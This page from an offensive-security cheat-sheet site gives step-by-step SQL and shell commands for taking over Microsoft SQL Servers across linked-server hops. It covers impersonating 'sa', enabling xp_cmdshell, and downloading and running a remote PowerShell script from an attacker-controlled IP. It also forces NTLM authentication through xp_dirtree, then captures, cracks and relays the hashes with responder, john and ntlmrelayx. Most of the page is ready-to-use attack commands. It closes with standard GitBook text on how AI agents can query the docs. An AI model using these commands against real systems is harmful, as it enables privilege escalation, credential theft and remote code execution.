> For the complete documentation index, see [llms.txt](https://vulnableone.gitbook.io/vulnableone/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://vulnableone.gitbook.io/vulnableone/offensive-treasure/ad-attack/ms-sql-servers/sql-server-management.md).

# SQL Server Management

## First Instance

```sql
# Enumeration
select CURRENT_USER
SELECT IS_SRVROLEMEMBER('sysadmin')
select loginname from syslogins where sysadmin = 1
SELECT srvname, srvproduct, rpcout FROM master..sysservers

# Impersonate
SELECT distinct b.name FROM sys.server_permissions a INNER JOIN sys.server_principals b ON a.grantor_principal_id = b.principal_id WHERE a.permission_name = 'IMPERSONATE'
EXECUTE AS login = 'sa'; SELECT IS_SRVROLEMEMBER('sysadmin')

# Enable RCP Out
EXECUTE AS LOGIN = 'sa'; EXEC sp_serveroption 'APPSRV01','rpc out','true'

# Verify Xp_cmdshell
SELECT * FROM sys.configurations WHERE name = 'xp_cmdshell'

# Enable Xp_cmdshell
EXECUTE AS LOGIN = 'sa'; EXEC sp_configure 'show advanced options',1;RECONFIGURE ;EXEC sp_configure 'xp_cmdshell',1;RECONFIGURE

# Execute Xp_cmdshell
exec xp_cmdshell 'powershell -enc base64'
 
# UNC Path
EXEC xp_dirtree '\\10.10.10.10\test'
└─$ sudo responder -I tun0 -v    #Capture Hash
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt    #CrackHash
└─$ impacket-ntlmrelayx --no-http-server -smb2support -t 10.10.10.10    #NTLM Relay
```

## Second Instance

```sql
# Enumeration
exec ('select CURRENT_USER') AT APPSRV01
exec ('select @@servername') AT APPSRV01

# Impersonate
EXEC ('EXECUTE AS login = ''sa''; SELECT IS_SRVROLEMEMBER(''sysadmin'')') AT APPSRV01

# Verify Xp_cmdshell
EXEC ('SELECT * FROM sys.configurations WHERE name = ''xp_cmdshell''') AT APPSRV01

# Enable Xp_cmdshell
EXEC ('EXEC sp_configure ''show advanced options'', 1;RECONFIGURE;exec SP_CONFIGURE ''xp_cmdshell'', 1;RECONFIGURE') AT APPSRV01

# Execute Xp_cmdshell
EXEC ('EXEC xp_cmdshell "powershell IEX (new-object net.webclient).downloadstring(''http://10.10.10.10/run.txt'')"') AT APPSRV01
```

## Third Instance

```sql
# Enumeration
EXEC ('EXEC (''select @@servername'') AT DC01') AT APPSRV01
EXEC ('EXEC (''select loginname from syslogins where sysadmin = 1'') AT APPSRV02') AT APPSRV01

# Impersonate
EXEC ('EXEC (''EXECUTE AS login = ''''sa''''; SELECT IS_SRVROLEMEMBER(''''sysadmin'''')'')AT APPSRV02') AT APPSRV01

# Verify Xp_cmdshell
EXEC ('EXEC (''SELECT * FROM sys.configurations WHERE name = ''''xp_cmdshell'''''') AT APPSRV02') AT APPSRV01

# Enable Xp_cmdshell
EXEC ('EXEC (''EXEC sp_configure ''''show advanced options'''', 1;RECONFIGURE;exec SP_CONFIGURE ''''xp_cmdshell'''', 1;RECONFIGURE'') AT APPSRV02') AT APPSRV01

# Execute Xp_cmdshell
EXEC ('EXEC (''EXEC xp_cmdshell "powershell IEX (new-object net.webclient).downloadstring(''''http://10.10.10.10/run.txt'''')"'') AT APPSRV02') AT APPSRV01
```


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://vulnableone.gitbook.io/vulnableone/offensive-treasure/ad-attack/ms-sql-servers/sql-server-management.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
